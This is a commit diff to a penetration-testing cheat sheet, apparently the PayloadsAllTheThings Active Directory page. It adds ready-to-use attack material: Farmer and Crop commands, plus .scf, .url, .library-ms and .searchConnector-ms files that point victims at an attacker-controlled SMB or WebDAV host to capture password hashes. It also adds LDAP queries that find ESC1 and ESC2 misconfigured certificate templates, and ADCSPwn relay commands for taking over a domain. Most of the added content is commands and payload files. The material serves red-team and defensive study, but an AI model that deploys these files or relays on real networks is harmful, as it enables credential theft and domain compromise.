mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2024-06-30 19:02:55 +00:00
ESC2 + Windows Search Connectors - Windows Library Files
This commit is contained in:
parent
88321a332f
commit
0f94adafe5
@ -16,6 +16,10 @@
|
|||||||
- [PrintNightmare](#printnightmare)
|
- [PrintNightmare](#printnightmare)
|
||||||
- [Open Shares](#open-shares)
|
- [Open Shares](#open-shares)
|
||||||
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
|
||||||
|
- [SCF Files](#scf-files)
|
||||||
|
- [URL Files](#url-files)
|
||||||
|
- [Windows Library Files](#windows-library-files)
|
||||||
|
- [Windows Search Connectors Files](#windows-search-connectors-files)
|
||||||
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
|
||||||
- [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
|
- [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
|
||||||
- [Find vulnerable GPO](#find-vulnerable-gpo)
|
- [Find vulnerable GPO](#find-vulnerable-gpo)
|
||||||
@ -65,6 +69,7 @@
|
|||||||
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
- [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||||
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
||||||
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
||||||
|
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
||||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
@ -709,6 +714,22 @@ Requirements:
|
|||||||
|
|
||||||
### SCF and URL file attack against writeable share
|
### SCF and URL file attack against writeable share
|
||||||
|
|
||||||
|
Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Farmer to receive auth
|
||||||
|
farmer.exe <port> [seconds] [output]
|
||||||
|
farmer.exe 8888 0 c:\windows\temp\test.tmp # undefinitely
|
||||||
|
farmer.exe 8888 60 # one minute
|
||||||
|
|
||||||
|
# Crop can be used to create various file types that will trigger SMB/WebDAV connections for poisoning file shares during hash collection attacks
|
||||||
|
crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options]
|
||||||
|
Crop.exe \\\\fileserver\\common mdsec.url \\\\workstation@8888\\mdsec.ico
|
||||||
|
Crop.exe \\\\fileserver\\common mdsec.library-ms \\\\workstation@8888\\mdsec
|
||||||
|
```
|
||||||
|
|
||||||
|
#### SCF Files
|
||||||
|
|
||||||
Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
|
Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -719,6 +740,8 @@ IconFile=\\10.10.10.10\Share\test.ico
|
|||||||
Command=ToggleDesktop
|
Command=ToggleDesktop
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### URL Files
|
||||||
|
|
||||||
This attack also works with `.url` files and `responder -I eth0 -v`.
|
This attack also works with `.url` files and `responder -I eth0 -v`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -729,6 +752,53 @@ IconFile=\\10.10.10.10\%USERNAME%.icon
|
|||||||
IconIndex=1
|
IconIndex=1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Windows Library Files
|
||||||
|
|
||||||
|
> Windows Library Files (.library-ms)
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<libraryDescription xmlns="<http://schemas.microsoft.com/windows/2009/library>">
|
||||||
|
<name>@windows.storage.dll,-34582</name>
|
||||||
|
<version>6</version>
|
||||||
|
<isLibraryPinned>true</isLibraryPinned>
|
||||||
|
<iconReference>imageres.dll,-1003</iconReference>
|
||||||
|
<templateInfo>
|
||||||
|
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
|
||||||
|
</templateInfo>
|
||||||
|
<searchConnectorDescriptionList>
|
||||||
|
<searchConnectorDescription>
|
||||||
|
<isDefaultSaveLocation>true</isDefaultSaveLocation>
|
||||||
|
<isSupported>false</isSupported>
|
||||||
|
<simpleLocation>
|
||||||
|
<url>\\\\workstation@8888\\folder</url>
|
||||||
|
</simpleLocation>
|
||||||
|
</searchConnectorDescription>
|
||||||
|
</searchConnectorDescriptionList>
|
||||||
|
</libraryDescription>
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Windows Search Connectors Files
|
||||||
|
|
||||||
|
> Windows Search Connectors (.searchConnector-ms)
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<searchConnectorDescription xmlns="<http://schemas.microsoft.com/windows/2009/searchConnector>">
|
||||||
|
<iconReference>imageres.dll,-1002</iconReference>
|
||||||
|
<description>Microsoft Outlook</description>
|
||||||
|
<isSearchOnlyItem>false</isSearchOnlyItem>
|
||||||
|
<includeInStartMenuScope>true</includeInStartMenuScope>
|
||||||
|
<iconReference>\\\\workstation@8888\\folder.ico</iconReference>
|
||||||
|
<templateInfo>
|
||||||
|
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
|
||||||
|
</templateInfo>
|
||||||
|
<simpleLocation>
|
||||||
|
<url>\\\\workstation@8888\\folder</url>
|
||||||
|
</simpleLocation>
|
||||||
|
</searchConnectorDescription>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Passwords in SYSVOL & Group Policy Preferences
|
### Passwords in SYSVOL & Group Policy Preferences
|
||||||
|
|
||||||
@ -1808,6 +1878,8 @@ Exploitation:
|
|||||||
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
|
* Use [Certify.exe](https://github.com/GhostPack/Certify) to see if there are any vulnerable templates
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe find /vulnerable
|
Certify.exe find /vulnerable
|
||||||
|
or
|
||||||
|
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
||||||
```
|
```
|
||||||
* Use Certify to request a Certificate and add an alternative name (user to impersonate)
|
* Use Certify to request a Certificate and add an alternative name (user to impersonate)
|
||||||
```ps1
|
```ps1
|
||||||
@ -1827,6 +1899,19 @@ Exploitation:
|
|||||||
**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
|
**NOTE**: Look for **EDITF_ATTRIBUTESUBJECTALTNAME2**, **CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT**, **ManageCA** flags, and NTLM Relay to AD CS HTTP Endpoints.
|
||||||
|
|
||||||
|
|
||||||
|
#### ESC2 - Misconfigured Certificate Templates
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
* Allows requesters to specify a SAN in the CSR as well as allows Any Purpose EKU (2.5.29.37.0)
|
||||||
|
|
||||||
|
Exploitation:
|
||||||
|
* Find template
|
||||||
|
```ps1
|
||||||
|
PS > Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=megacorp,DC=local'
|
||||||
|
```
|
||||||
|
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
||||||
|
|
||||||
|
|
||||||
#### ESC8 - AD CS Relay Attack
|
#### ESC8 - AD CS Relay Attack
|
||||||
|
|
||||||
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
|
> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
|
||||||
@ -1869,7 +1954,26 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
|||||||
# Mimikatz
|
# Mimikatz
|
||||||
mimikatz> lsadump::dcsync /user:krbtgt
|
mimikatz> lsadump::dcsync /user:krbtgt
|
||||||
```
|
```
|
||||||
|
* Version 3: ADCSPwn
|
||||||
|
```powershell
|
||||||
|
https://github.com/bats3c/ADCSPwn
|
||||||
|
adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
|
||||||
|
adcspwn.exe --adcs cs.pwnlab.local
|
||||||
|
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
|
||||||
|
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
|
||||||
|
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
|
||||||
|
|
||||||
|
# ADCSPwn arguments
|
||||||
|
adcs - This is the address of the AD CS server which authentication will be relayed to.
|
||||||
|
secure - Use HTTPS with the certificate service.
|
||||||
|
port - The port ADCSPwn will listen on.
|
||||||
|
remote - Remote machine to trigger authentication from.
|
||||||
|
username - Username for non-domain context.
|
||||||
|
password - Password for non-domain context.
|
||||||
|
dc - Domain controller to query for Certificate Templates (LDAP).
|
||||||
|
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||||
|
output - Output path to store base64 generated crt.
|
||||||
|
```
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
@ -2914,4 +3018,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
|||||||
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
|
||||||
* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
|
* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
|
||||||
* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf)
|
* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf)
|
||||||
* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2)
|
* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2)
|
||||||
|
* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/)
|
||||||
|
Loading…
Reference in New Issue
Block a user